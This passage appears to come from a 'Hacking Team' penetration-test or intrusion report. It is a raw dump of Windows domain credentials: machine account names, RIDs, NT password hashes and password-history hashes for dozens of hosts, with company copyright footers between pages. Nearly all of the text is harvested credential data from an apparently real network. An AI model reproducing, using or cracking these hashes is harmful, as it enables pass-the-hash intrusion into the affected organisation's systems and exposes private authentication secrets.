FT0017$_history_1:6139:NO PASSWORD*********************:D59CD6CD1A123043772408AC337E97DD:::
FT0017$_history_2:6139:NO PASSWORD*********************:E63055C9B5D3D0D16F5F966414BFF3ED:::
FT0017$_history_3:6139:NO PASSWORD*********************:FCAE3B22512043A7B69B362C4458EF7E:::
FT0017$_history_4:6139:NO PASSWORD*********************:E01631E0B86F50602FA34196F5EF451E:::
FT0017$_history_5:6139:NO PASSWORD*********************:4A47217113D76C9CB79B820B7CA7CC27:::
FT0017$_history_6:6139:NO PASSWORD*********************:A5EDEF2B00DE56D40C3AD5EAC1F64264:::
FT0017$_history_7:6139:NO PASSWORD*********************:DB0B3272CBC14DEDA2421E6BF220C793:::
FT0017$_history_8:6139:NO PASSWORD*********************:5DBA2E28D843BAA3607A239EBAF9D3FB:::
FT0017$_history_9:6139:NO PASSWORD*********************:9F1D2BAA3F2157693BE94035570F6996:::
FT0017$_history_10:6139:NO PASSWORD*********************:E4585F99DF61C0CF785C602371A14C9B:::
CS0061$:6140:NO PASSWORD*********************:134BE154153787EBADCF820FD0FCA4EB:::
CS0061$_history_0:6140:NO PASSWORD*********************:80D411A43F90E0039EE2DB97C1BA4AC9:::
CS0061$_history_1:6140:NO PASSWORD*********************:B8F8C33863789FF4D067F1DFC585B0A4:::
CS0061$_history_2:6140:NO PASSWORD*********************:AADD9F52FF6C5F7DB1E823C5E59F5E69:::
CS0061$_history_3:6140:NO PASSWORD*********************:0A9EAF7A2B9FB20A9A180B3B85E2C033:::
CS0061$_history_4:6140:NO PASSWORD*********************:BC8468552882814C592F71D4AE77F0E8:::
CS0061$_history_5:6140:NO PASSWORD*********************:03298D889016C5ACD9815B62B4D4820C:::
CS0061$_history_6:6140:NO PASSWORD*********************:89B508C4CDC27DBBBCB083F2ADEEF66F:::
CS0061$_history_7:6140:NO PASSWORD*********************:6D96B9C8E7558B99B1604AE38C66A23A:::
CS0061$_history_8:6140:NO PASSWORD*********************:4AAADDCBE8FE4550167D3D2BF122E2DE:::
CS0061$_history_9:6140:NO PASSWORD*********************:5FAC342E50624140900D51D358C82612:::
CS0061$_history_10:6140:NO PASSWORD*********************:E3319D1A12BA12B5FA5B23F16C9F0EB3:::
N600-0060$:6142:NO PASSWORD*********************:06407DD6153004CEAF66ECEFB517A539:::
N600-0060$_history_0:6142:NO PASSWORD*********************:6C7E530629EE502A75E0E732483FA99F:::
N600-0060$_history_1:6142:NO PASSWORD*********************:7946135197A427FB3FD54505F39CFCBA:::
N600-0060$_history_2:6142:NO PASSWORD*********************:BC6DB57CA8E372A0C802D93CE2956BE7:::
N600-0060$_history_3:6142:NO PASSWORD*********************:962054F99DC4DE17B122A951F1369C85:::
N600-0060$_history_4:6142:NO PASSWORD*********************:DDA770449597E390C7DD26CB36E42024:::
CS0415$:6144:NO PASSWORD*********************:B8331C566D69198B975E0AF478A5F830:::
CS0415$_history_0:6144:NO PASSWORD*********************:B179C1931394AE9FBFE3F2B11A2DEAF0:::
CS0415$_history_1:6144:NO PASSWORD*********************:1E201ADFF15E95589642CAAA55D6EBAD:::
CS0415$_history_2:6144:NO PASSWORD*********************:B3D9F8B464C514E440ADAAF5057B47CE:::
CS0415$_history_3:6144:NO PASSWORD*********************:CEFC3A82FD2E21F4A405F1C549723ABF:::
CS0415$_history_4:6144:NO PASSWORD*********************:2997850FE84D1D22E3EEAD92BB9FAF57:::
CS0415$_history_5:6144:NO PASSWORD*********************:57B5A92367370AB0CF1F359CF3DBC5DF:::
CS0415$_history_6:6144:NO PASSWORD*********************:87B6DCD34CC188F12A65855B859E0A80:::
CS0415$_history_7:6144:NO PASSWORD*********************:F0291376CF4D26BD508B8A693748AA03:::
CS0415$_history_8:6144:NO PASSWORD*********************:2EB219E16F45134A11EDD04A2602FBD7:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 449 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
CS0415$_history_9:6144:NO PASSWORD*********************:85E5E8B3A09516BA3D864D4EF7391F36:::
CS0415$_history_10:6144:NO PASSWORD*********************:0DDDA299F37A0148E356C717C68499E7:::
C400-235$:6145:NO PASSWORD*********************:B895CFAC12C04F356B0BA35AEFE47FCA:::
C400-235$_history_0:6145:NO PASSWORD*********************:48467A9963B963D6FA18AB52FF910642:::
C400-235$_history_1:6145:NO PASSWORD*********************:57E86D8C03EE1D4B5A8691DFCC4384EF:::
C400-235$_history_2:6145:NO PASSWORD*********************:F928D764596D8C1D641364175654D892:::
C400-235$_history_3:6145:NO PASSWORD*********************:BBA2A940B6173566C79CF2EA1F33610C:::
C400-235$_history_4:6145:NO PASSWORD*********************:2894E707380C6B70E1EB761AFE449889:::
C400-235$_history_5:6145:NO PASSWORD*********************:D4B61AB17543568C1C26ECDE87835F1A:::
C400-235$_history_6:6145:NO PASSWORD*********************:08C3CA794A62E4324E07212B31746608:::
C400-235$_history_7:6145:NO PASSWORD*********************:1D808EE4D77D38451BFFAAF7A46651C5:::
C400-235$_history_8:6145:NO PASSWORD*********************:0075C6376299BCAF954B1E3AC4A3EF9A:::
C400-235$_history_9:6145:NO PASSWORD*********************:574AF119DF7462BBB9E1E972804A359A:::
C400-235$_history_10:6145:NO PASSWORD*********************:2B25AB5DDFBD16E07AF7329A5C8B754B:::
BLP-67E42204BAE$:6149:NO PASSWORD*********************:BB78489B916C980BBE169344EDFDCF41:::
BLP-67E42204BAE$_history_0:6149:NO PASSWORD*********************:77D79AF55F0AE60278657BA53F2EF7BE:::
BLP-67E42204BAE$_history_1:6149:NO PASSWORD*********************:98FEA902855002FABFA29CBBF77F3418:::
BLP-67E42204BAE$_history_2:6149:NO PASSWORD*********************:AB8597280E67F4EB9BE002D0B98CA315:::
BLP-67E42204BAE$_history_3:6149:NO PASSWORD*********************:5A91DE059932BA3D74556CAC1BEFFF92:::
BLP-67E42204BAE$_history_4:6149:NO PASSWORD*********************:FC7D474D9D4CDF54F3610F1357BC1F34:::
BLP-67E42204BAE$_history_5:6149:NO PASSWORD*********************:125862D2648B7638B1B2B6C9AB12B8A8:::
BLP-67E42204BAE$_history_6:6149:NO PASSWORD*********************:E9D091AEB552DAB6DEB7DA3EF6983B63:::
BLP-67E42204BAE$_history_7:6149:NO PASSWORD*********************:02112A762A9410738F83F40DC6D19E05:::
BLP-67E42204BAE$_history_8:6149:NO PASSWORD*********************:ADEC4902E5FD6B0032625699F22A9741:::
BLP-67E42204BAE$_history_9:6149:NO PASSWORD*********************:4F24B5A8A80E9CE9117D335AAA309304:::
BLP-67E42204BAE$_history_10:6149:NO PASSWORD*********************:A4F7DE5681C6B9D1470ED5059529FC27:::
RECEPTION5$:6150:NO PASSWORD*********************:ABE2B4EB69F20375A6774243999FAD82:::
RECEPTION5$_history_0:6150:NO PASSWORD*********************:9E3345494BDAF371DD5984E1CAC65391:::
RECEPTION5$_history_1:6150:NO PASSWORD*********************:0ED22774D514BD4D2B8D2C56AC9FC749:::
RECEPTION5$_history_2:6150:NO PASSWORD*********************:5C1B4E544364D399D4C750699008E1F1:::
RECEPTION5$_history_3:6150:NO PASSWORD*********************:F2F0434787623C0451279E9880B107E5:::
RECEPTION5$_history_4:6150:NO PASSWORD*********************:20FFF3E5D8E1A3455D74C7F8762B421C:::
RECEPTION5$_history_5:6150:NO PASSWORD*********************:F9E3B3DD0266F9E94B9DFAE8D61BA144:::
RECEPTION5$_history_6:6150:NO PASSWORD*********************:FF22527AC5090D350B45B11AD226CDB5:::
RECEPTION5$_history_7:6150:NO PASSWORD*********************:0FC7B2F451B1A45043457B63B48CE243:::
RECEPTION5$_history_8:6150:NO PASSWORD*********************:FE7A50FCB7A244E9D2086E89E6DD6CD9:::
RECEPTION5$_history_9:6150:NO PASSWORD*********************:70FA0C3450A0C70569BE589E2712F5E8:::
RECEPTION5$_history_10:6150:NO PASSWORD*********************:A385715C0E9276EF17E7F3BA9F7C8B33:::
EC0023$:6155:NO PASSWORD*********************:869DD249B762C6C1A856EAE1F20C9CD9:::
EC0023$_history_0:6155:NO PASSWORD*********************:42633344AB4B9A183B07EBF4CEDB23D3:::
EC0023$_history_1:6155:NO PASSWORD*********************:53CD2BA7E94ACB17F3FEE68FBBC34AAB:::
EC0023$_history_2:6155:NO PASSWORD*********************:1DBA529360534015EE35DC2543EB17BE:::
EC0023$_history_3:6155:NO PASSWORD*********************:4AB3721FAF99D92683B9D727565AA19F:::
EC0023$_history_4:6155:NO PASSWORD*********************:3D531F5CE071E1976D792F6091BF781C:::
EC0023$_history_5:6155:NO PASSWORD*********************:274077CF9493E688694D586B1D4D7769:::
EC0023$_history_6:6155:NO PASSWORD*********************:5EEC60BA86F123A549908863B8111C63:::
EC0023$_history_7:6155:NO PASSWORD*********************:21C83F484F1A861578D401CE2B05D66A:::
EC0023$_history_8:6155:NO PASSWORD*********************:3C42D8FB9125591DA22FB4AFA3DFAE8F:::
EC0023$_history_9:6155:NO PASSWORD*********************:916750C973DF1752CF9E4F2E64B22B95:::
EC0023$_history_10:6155:NO PASSWORD*********************:F0FE37379AB7DEB64016983632294CA6:::
LONRU01$:6159:NO PASSWORD*********************:94689F792CB5B7E26FA889EA3BDBF850:::
LONRU01$_history_0:6159:NO PASSWORD*********************:5FACEB365E483801BD2D91F81341D1FC:::
LONRU01$_history_1:6159:NO PASSWORD*********************:85AD1D6DD29C9D455F54DEFC5B4037E6:::
LONRU01$_history_2:6159:NO PASSWORD*********************:00783E36CFCF6537287BD7B18BA8ED0F:::
LONRU01$_history_3:6159:NO PASSWORD*********************:AEFCF0F0EC768394DD685E993E978589:::
LONRU01$_history_4:6159:NO PASSWORD*********************:B12350A1037C403FF67F6BD4D86402A4:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 450 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
LONRU01$_history_5:6159:NO PASSWORD*********************:CD4E919023970C9D82B662773DC176F6:::
LONRU01$_history_6:6159:NO PASSWORD*********************:28889B8AC0CAAB12FE3E416D9EE58B08:::
LONRU01$_history_7:6159:NO PASSWORD*********************:D066FE68CD8251E3288D0DDC58DC1C67:::
LONRU01$_history_8:6159:NO PASSWORD*********************:64A7F178E77A14232639DD0A4562D5E8:::
LN0432$:6167:NO PASSWORD*********************:67DAECC28A47D8197F6353DE24422E4B:::
LN0432$_history_0:6167:NO PASSWORD*********************:6309DE86C3C1348F697CB68E7CC7DE28:::
LN0432$_history_1:6167:NO PASSWORD*********************:EF7E31ACDBCA4197306B305968963DC3:::
LN0432$_history_2:6167:NO PASSWORD*********************:33E176E9C3E8C19651539BD578EB091A:::
LN0432$_history_3:6167:NO PASSWORD*********************:47A9FAA6E401983F4ED1FA49FA62E35B:::
LN0432$_history_4:6167:NO PASSWORD*********************:15E866D564D2C46E2AA8594D89E14052:::
LN0432$_history_5:6167:NO PASSWORD*********************:0F16E6178E365B797F92877051D7AD4C:::
LN0432$_history_6:6167:NO PASSWORD*********************:3D260994E9E5D0DC304A60B89B719F06:::
LN0432$_history_7:6167:NO PASSWORD*********************:555FEFE02AD5DD7BD6F5A2BEE2A87E63:::
LN0432$_history_8:6167:NO PASSWORD*********************:DDF8E8C724172A332E650CE7C3F90AC5:::
LN0432$_history_9:6167:NO PASSWORD*********************:D7B72C70DF9C415470442DB28A9CCE98:::
LN0432$_history_10:6167:NO PASSWORD*********************:C45CD9147B97F095EE4D51DAF2C7C822:::
LONLAPTOP$:6169:NO PASSWORD*********************:86A4C216413619C0EA065E919AB4C421:::
LONLAPTOP$_history_0:6169:NO PASSWORD*********************:81EAAF8E57E60AE0F39758277FBC08D0:::
PF0434$:6175:NO PASSWORD*********************:3362ADF0E75F8E51A16E9A7BC1DD9A68:::
PF0434$_history_0:6175:NO PASSWORD*********************:11EBFF791094DC1A239D334286D8B797:::
PF0434$_history_1:6175:NO PASSWORD*********************:6F5E3CF7A1550B2C5B4DA1D430FEABE4:::
PF0434$_history_2:6175:NO PASSWORD*********************:854E4D5BC7EA50786C384515D736477B:::
PF0434$_history_3:6175:NO PASSWORD*********************:9BB91E145380D238AE32CE639A91508E:::
PF0434$_history_4:6175:NO PASSWORD*********************:912E6426A3245801A593066DE0C40B63:::
PF0434$_history_5:6175:NO PASSWORD*********************:ADB4408553CF13911C89D336D6E84F69:::
PF0434$_history_6:6175:NO PASSWORD*********************:B02DFD018C6A4B5C56ADC9C5FED7DBFD:::
PF0434$_history_7:6175:NO PASSWORD*********************:11380AC4F44C2C8980488EB67030E9CA:::
PF0434$_history_8:6175:NO PASSWORD*********************:F7590F18602D0A6F865DBEB55A0FC84B:::
SB0026$:6176:NO PASSWORD*********************:89B4C162C3FDF9B7A51FB8A4C306D3A6:::
SB0026$_history_0:6176:NO PASSWORD*********************:C90ED1F8630201DC4D030A4F2ED7A3FB:::
SB0026$_history_1:6176:NO PASSWORD*********************:62768986A85549CC49887A8F90EE1A28:::
SB0026$_history_2:6176:NO PASSWORD*********************:4BCB4174CCFAB9926F38641B0E4447E7:::
SB0026$_history_3:6176:NO PASSWORD*********************:9B18AFFA3023A11476F8D29031DE0903:::
SB0026$_history_4:6176:NO PASSWORD*********************:69AD53AE815E9E2340D1E28A973960A3:::
SB0026$_history_5:6176:NO PASSWORD*********************:533A7C07AFCA575CA6F840A9F8E585C6:::
SB0026$_history_6:6176:NO PASSWORD*********************:B64C942AD1B080770D4B1760060EFA6D:::
SB0026$_history_7:6176:NO PASSWORD*********************:50324BD3D1B408572B9CA345DFDAFB02:::
SB0026$_history_8:6176:NO PASSWORD*********************:01D4ED22E353302483878F325F62900B:::
EC405$:6180:NO PASSWORD*********************:C02609CEC48D5E6BE186E16721C8CF27:::
EC405$_history_0:6180:NO PASSWORD*********************:881A080F028F74A4AD906BEB7886883B:::
EC405$_history_1:6180:NO PASSWORD*********************:86E1282951099F80E8F76DC2B31FAA0C:::
EC405$_history_2:6180:NO PASSWORD*********************:474BF8D82501F90112251550CB9D410F:::
EC405$_history_3:6180:NO PASSWORD*********************:EB9D523F427FAF65025BFFEB528B4CED:::
EC405$_history_4:6180:NO PASSWORD*********************:D1C5F612849290C5E72E5F3C60498E27:::
EC405$_history_5:6180:NO PASSWORD*********************:7BE733C68B78C1DCCCFF33C99FAB7EF3:::
EC405$_history_6:6180:NO PASSWORD*********************:9BC22200549954C0AD86433143D92F17:::
EC405$_history_7:6180:NO PASSWORD*********************:D370B81DEB8D0A612BE13C1E6BEABFAC:::
EC405$_history_8:6180:NO PASSWORD*********************:FE6B83A71AE92BF3B7FB977BFB25790C:::
EC405$_history_9:6180:NO PASSWORD*********************:6B63A285511AC5DAC63D39BE636B1E2E:::
BR0098$:6187:NO PASSWORD*********************:B03A3F61E15960C7E33B60A21A6CB3A9:::
BR0098$_history_0:6187:NO PASSWORD*********************:566C2CA21113EE01F19BC09DCE003A08:::
BR0098$_history_1:6187:NO PASSWORD*********************:306ACCAA3F1C0DAA58B4A243AECD35C6:::
BR0098$_history_2:6187:NO PASSWORD*********************:D7BA3727BB38DFB88CB9B5B77C72679C:::
BR0098$_history_3:6187:NO PASSWORD*********************:E4A4DC20EAA559D55CCC6806E2E54735:::
BR0098$_history_4:6187:NO PASSWORD*********************:E4A8B181C5F4397BB7153B6C74B2D901:::
BR0098$_history_5:6187:NO PASSWORD*********************:9CCD0DF9B7976F9A5C61A6B39460DBD8:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 451 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
BR0098$_history_6:6187:NO PASSWORD*********************:A9CF98F23E224454BEE8680792238EB1:::
CN0440$:6188:NO PASSWORD*********************:A65EEF33DC9CBADAA752C29484E99EFE:::
CN0440$_history_0:6188:NO PASSWORD*********************:634AF4909837662C1FC641718EB6684E:::
CN0440$_history_1:6188:NO PASSWORD*********************:59EB33C8C1E6F5C4DED0337668B134C1:::
CN0440$_history_2:6188:NO PASSWORD*********************:E5417421BFF2D2547C39F5C04E1EB9C0:::
CN0440$_history_3:6188:NO PASSWORD*********************:8FA0FF4032B9FFB76A0E666065E8DD91:::
CN0440$_history_4:6188:NO PASSWORD*********************:06623A588ED3AEEF3F6B7AAC6441C60B:::
CN0440$_history_5:6188:NO PASSWORD*********************:9CE2B370718BC88D0AE0E7E77068A934:::
CN0440$_history_6:6188:NO PASSWORD*********************:ADAE93BC7E14DB9A96F21121BD812A87:::
RECEPTION0047$:6194:NO PASSWORD*********************:EDF513B174B5E7F6C85BEEAD5560B888:::
SPARELAPTOP$:6202:NO PASSWORD*********************:275F16D989F49812B6A86CF2CB82A407:::
LAP0233$:6204:NO PASSWORD*********************:BAA24D7E25511CD04855CEE54B537B9D:::
0060MARKET$:6211:NO PASSWORD*********************:361EACF37127368800D48A4E4A39B8B3:::
0060MARKET$_history_0:6211:NO PASSWORD*********************:8DD2D33537ADBA6D3900C17A215E9BFE:::
LONSPARELAP$:6604:NO PASSWORD*********************:1AAE2ABA73564470EB0CF282215438C2:::
LONSPARELAP$_history_0:6604:NO PASSWORD*********************:BBA9538C14E7886DE6E375E4C1EB473C:::
COMPAQEVO1$:6608:NO PASSWORD*********************:5BA4E9309B32DA4BC41146CBC3437E6E:::
COMPAQEVO1$_history_0:6608:NO PASSWORD*********************:3EF02BA55E23C07A3BDD0D841EEFFBC6:::
COMPAQEVO1$_history_1:6608:NO PASSWORD*********************:4AA3D75BCBDD7460B269F749CAD071AE:::
C400-0412$:6609:NO PASSWORD*********************:97250982C9224487D4B5D07B5FED0858:::
C400-0047$:6610:NO PASSWORD*********************:F467EF4AC2F758BDEAA25E3F76B8216E:::
C400-0047$_history_0:6610:NO PASSWORD*********************:EC90B51773ADCB3E6C77B124C9019883:::
C400-0047$_history_1:6610:NO PASSWORD*********************:1A78E0B41367B7B7E3D806A669044A0C:::
C400-0047$_history_2:6610:NO PASSWORD*********************:86A274F99B4A6F079DBFC15AF457800B:::
AK0399$:6621:NO PASSWORD*********************:3AD4F59DAC1C565E32A78A62607AC5AC:::
AK0399$_history_0:6621:NO PASSWORD*********************:0E0963090E73F56492E994154FDFC10B:::
AK0399$_history_1:6621:NO PASSWORD*********************:A930BFA726DB2C2FED2CB5BF0DEF3082:::
AK0399$_history_2:6621:NO PASSWORD*********************:6D00E0AA3E95FD1901BA13ACA8A881E3:::
AK0399$_history_3:6621:NO PASSWORD*********************:7565D8796484F66A4425B95ECA34E834:::
AK0399$_history_4:6621:NO PASSWORD*********************:CEB9CC8D773005EC2F922ABC00EAB15F:::
AK0399$_history_5:6621:NO PASSWORD*********************:4E9B3666C6FFC9900099D797C5577C45:::
AK0399$_history_6:6621:NO PASSWORD*********************:575D505B63B51F80614459D3B29063FF:::
AK0399$_history_7:6621:NO PASSWORD*********************:29006D6BF5E7C8D5A6D2287D846AB294:::
AK0399$_history_8:6621:NO PASSWORD*********************:535FE27B7F669B03EF28BA044D027B07:::
AK0399$_history_9:6621:NO PASSWORD*********************:5F7385EF75FA3F69062175C3D95450F0:::
AK0399$_history_10:6621:NO PASSWORD*********************:86E7775729BC45BE5713EFF0A34E206F:::
FM0254$:6622:NO PASSWORD*********************:2A80EB457CCEF122CB98A77DB441879F:::
FM0254$_history_0:6622:NO PASSWORD*********************:77ABF15FB41D441BCD063A760C81A562:::
FM0254$_history_1:6622:NO PASSWORD*********************:F03DEE89D9BB08E4889D0EF0B315A4F1:::
FM0254$_history_2:6622:NO PASSWORD*********************:26C6E9DFDE1DC66A6EA6942D9F86B5DD:::
FM0254$_history_3:6622:NO PASSWORD*********************:31217E69251D8866A977263E84480A65:::
FM0254$_history_4:6622:NO PASSWORD*********************:18CE088F21AE9B995A6318733F2FF0C1:::
FM0254$_history_5:6622:NO PASSWORD*********************:605B1D51C99C23B3423AE6ED963399D5:::
FM0254$_history_6:6622:NO PASSWORD*********************:9809D170F09E88C44BA1CE23769E7267:::
FM0254$_history_7:6622:NO PASSWORD*********************:C142203BBD39D7D48B08BF57B8D94E8F:::
FM0254$_history_8:6622:NO PASSWORD*********************:00852083BE59456B59ABA9171DF10A6F:::
FM0254$_history_9:6622:NO PASSWORD*********************:E9FDAE47DC9DD8C485858ABB4D6D010C:::
FM0254$_history_10:6622:NO PASSWORD*********************:5131E83A871DDE9261BCE3E34223167A:::
OC0067$:6623:NO PASSWORD*********************:60243A5AC572363F3BD3C131E9389978:::
OC0067$_history_0:6623:NO PASSWORD*********************:7BA06619FD22C0388C1CA3CFD6C3E33E:::
OC0067$_history_1:6623:NO PASSWORD*********************:3404D65026C37C7102728A9DB6322FD0:::
OC0067$_history_2:6623:NO PASSWORD*********************:572EBAA0540189543604910F4287B382:::
OC0067$_history_3:6623:NO PASSWORD*********************:7F5FBB00A7DAAC780CB71EF707CA9005:::
OC0067$_history_4:6623:NO PASSWORD*********************:79A571BB3065F94AE5601B6F6BE43FEA:::
OC0067$_history_5:6623:NO PASSWORD*********************:AC63EDF4BDBD9730E75FFE2A4D3318AF:::
OC0067$_history_6:6623:NO PASSWORD*********************:7F434A76FB86946CFD785E3763E2158C:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 452 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
OC0067$_history_7:6623:NO PASSWORD*********************:6E48692DE14124E408F0E2C4C7FC5FA8:::
OC0067$_history_8:6623:NO PASSWORD*********************:B975C753C8B4CA3C84BC5A86221FC9AC:::
OC0067$_history_9:6623:NO PASSWORD*********************:801D3E4DB255F0EFBFE4F962BF80FDC5:::
OC0067$_history_10:6623:NO PASSWORD*********************:83BBE88909F2EBEB67841166AF599220:::
OC0374$:6624:NO PASSWORD*********************:8239DF2DDB0E739EE2EF1144644AF218:::
OC0374$_history_0:6624:NO PASSWORD*********************:01B410E3A7B4BB4DBB21039BE2F67002:::
OC0374$_history_1:6624:NO PASSWORD*********************:1024CCBA54747E3F97860EC7BD07A382:::
OC0374$_history_2:6624:NO PASSWORD*********************:C01BD2947CF91689A7AA59CB3D2A6CA5:::
OC0374$_history_3:6624:NO PASSWORD*********************:F525660235770E1B978BD7E2024A9363:::
OC0374$_history_4:6624:NO PASSWORD*********************:CC020EE878C378526F911A33CA11FBF7:::
OC0374$_history_5:6624:NO PASSWORD*********************:55B35CAF6956BD038F4DC03AA25B0C96:::
OC0374$_history_6:6624:NO PASSWORD*********************:A8D1F516B89C42AE3BD8D2387E50217F:::
OC0374$_history_7:6624:NO PASSWORD*********************:E6DF1408FE6679CAB1190ADABCEFC508:::
OC0374$_history_8:6624:NO PASSWORD*********************:8A27EE1F3EF7DF435A743485A7A41586:::
OC0374$_history_9:6624:NO PASSWORD*********************:1547CF105C86F6DD77E08E85A23BB223:::
OC0374$_history_10:6624:NO PASSWORD*********************:8E37BD5A7810BD247D6E5A510475F088:::
TDG0026$:6625:NO PASSWORD*********************:CD8B8021AB51E65756032063373099FE:::
TDG0026$_history_0:6625:NO PASSWORD*********************:DE19B443966E447954A2E19A69281678:::
TDG0026$_history_1:6625:NO PASSWORD*********************:F53D0296B30505D1CCBC62907C31FF0C:::
TDG0026$_history_2:6625:NO PASSWORD*********************:74F3E9447D05931F57A40C81A40F5807:::
TDG0026$_history_3:6625:NO PASSWORD*********************:4ED956FF9EF0F76658602AD1C01D2E32:::
TDG0026$_history_4:6625:NO PASSWORD*********************:FDDAE130CFD1435E4F1CE48376EC8279:::
TDG0026$_history_5:6625:NO PASSWORD*********************:8F197E3FCFEAD4D003A9027E09FBCF27:::
TDG0026$_history_6:6625:NO PASSWORD*********************:DD9286EE7300A3B11D1EA0FB41BBEDA9:::
TDG0026$_history_7:6625:NO PASSWORD*********************:FBB1BFACCCEBE6958B15917578EBDD8B:::
TDG0026$_history_8:6625:NO PASSWORD*********************:A4ACCE98079DF07944F52B1EC2E2132A:::
TDG0026$_history_9:6625:NO PASSWORD*********************:D85924C2961D4F5D55F293F8A7AC4EA3:::
TDG0026$_history_10:6625:NO PASSWORD*********************:921426670E569FC67B57FC67A847C140:::
SS0256$:6626:NO PASSWORD*********************:BC610CACC7544678DAAAE321ED560EC7:::
SS0256$_history_0:6626:NO PASSWORD*********************:869427B76717B2F93C8C47FCA84FC1B1:::
SS0256$_history_1:6626:NO PASSWORD*********************:70FF0ECA048F92E6B6638E49A662F041:::
SS0256$_history_2:6626:NO PASSWORD*********************:4E250661B85EEEC280CC40954B13177E:::
SS0256$_history_3:6626:NO PASSWORD*********************:87375FD45215C52FD24F7FE7319150E0:::
SS0256$_history_4:6626:NO PASSWORD*********************:577409CCA4E420091EDC6FEE2F6E66AE:::
SS0256$_history_5:6626:NO PASSWORD*********************:4C0B940976EBF066E0A06FC2B87F4A73:::
SS0256$_history_6:6626:NO PASSWORD*********************:F614E85198E466DD0FF3A011A0689396:::
SS0256$_history_7:6626:NO PASSWORD*********************:433A20F97F876F7A701994D2B6711953:::
SS0256$_history_8:6626:NO PASSWORD*********************:72218C0BA1F80F784E8521DAA738F342:::
SS0256$_history_9:6626:NO PASSWORD*********************:5C31189A5D2E3A3DB583E25F349639E0:::
SS0256$_history_10:6626:NO PASSWORD*********************:20B1AC701317A635F8167C2DE7997F32:::
GGALASSI$:6627:NO PASSWORD*********************:D798594B3E0B0E57A096B29C6E045AB7:::
GGALASSI$_history_0:6627:NO PASSWORD*********************:960CF20846A9136C7775F5B12E928297:::
GGALASSI$_history_1:6627:NO PASSWORD*********************:00AA4816A865ABFE1FE12D2AB4B6A977:::
GGALASSI$_history_2:6627:NO PASSWORD*********************:40E7DC00F97C47A20D8CF51E03613A2B:::
GGALASSI$_history_3:6627:NO PASSWORD*********************:E96B0EF83A9A1984AF8BCC6E9B3551DB:::
GGALASSI$_history_4:6627:NO PASSWORD*********************:212A7B36247228E8203ED4F4C602A4F7:::
GGALASSI$_history_5:6627:NO PASSWORD*********************:AE6ADACF3A0D29931FA9B2901EC2004C:::
GGALASSI$_history_6:6627:NO PASSWORD*********************:92F74941E9C9082D7289160B54EF2038:::
GGALASSI$_history_7:6627:NO PASSWORD*********************:0E58E680E4D85B8C1303275FC5BCBBBE:::
GGALASSI$_history_8:6627:NO PASSWORD*********************:B2C29DE17792BA559587FB88C615BE6D:::
GGALASSI$_history_9:6627:NO PASSWORD*********************:99669AB73C78AB331BD52281CD254115:::
OM0368$:6628:NO PASSWORD*********************:F2FF8BAE30E28A201CB18338C3F8ADC4:::
OM0368$_history_0:6628:NO PASSWORD*********************:25E12DCB332FA6CD9A6292D50489DAFD:::
OM0368$_history_1:6628:NO PASSWORD*********************:6A0E544CCA015FDBBF079023442E1A66:::
OM0368$_history_2:6628:NO PASSWORD*********************:C0AA7E5D39919FECDE48FFCB093FA50F:::
OM0368$_history_3:6628:NO PASSWORD*********************:F8E4B30AF7569A1CF0FF3EF0470EA72C:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 453 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
OM0368$_history_4:6628:NO PASSWORD*********************:F9452C2606494FB8B7C0A5A4550F6BED:::
OM0368$_history_5:6628:NO PASSWORD*********************:97052E2EDFDFDE6D0A47B4C203D3F29C:::
OM0368$_history_6:6628:NO PASSWORD*********************:E72C83769914A54FFF0A3F02A69BDBA2:::
OM0368$_history_7:6628:NO PASSWORD*********************:82D78529176ECD18024AB0CD0CA8015D:::
OM0368$_history_8:6628:NO PASSWORD*********************:F061ABF982C38ED8638FBD1EEE098C0D:::
OM0368$_history_9:6628:NO PASSWORD*********************:FFDFCA7D0414864F33EF1567CF49E1F9:::
OM0368$_history_10:6628:NO PASSWORD*********************:44F487EF45D69A973AF1FC7137632E6F:::
BS0252$:6629:NO PASSWORD*********************:BDE1C405B91850D2E522E35B6B6D9E7D:::
BS0252$_history_0:6629:NO PASSWORD*********************:6EC6D03DFCB1F26F3046561AA76BA69B:::
BS0252$_history_1:6629:NO PASSWORD*********************:E09AED5140982711604807633C35E59F:::
BS0252$_history_2:6629:NO PASSWORD*********************:8F27EABA54489D9B8EA65D81276F9908:::
BS0252$_history_3:6629:NO PASSWORD*********************:9889927A741ECDEB716D2276CF11DE5A:::
BS0252$_history_4:6629:NO PASSWORD*********************:4086584B6AF9187AA8611451DB194CD6:::
BS0252$_history_5:6629:NO PASSWORD*********************:6CB93560573D55C7B081B4681E6DDC7C:::
BS0252$_history_6:6629:NO PASSWORD*********************:F85BA38D496513D47EB148DD18F87A46:::
BS0252$_history_7:6629:NO PASSWORD*********************:76147A6DAB6469CD30EC91C726D5DFEA:::
BS0252$_history_8:6629:NO PASSWORD*********************:5DE4BE314745283C592B37F8FAF62F56:::
BS0252$_history_9:6629:NO PASSWORD*********************:AD54406573DEE9CBF563A02567A4B5BA:::
BS0252$_history_10:6629:NO PASSWORD*********************:093331ADC06806C4C6018D061C2A086C:::
NP0264$:6630:NO PASSWORD*********************:87E793B5D935C4ED04C50E1E76ACF839:::
NP0264$_history_0:6630:NO PASSWORD*********************:46EA53F0414E3CA0BAEA0029C7281B61:::
NP0264$_history_1:6630:NO PASSWORD*********************:F34D8F02CF4134DE16CE8A0958BBFE80:::
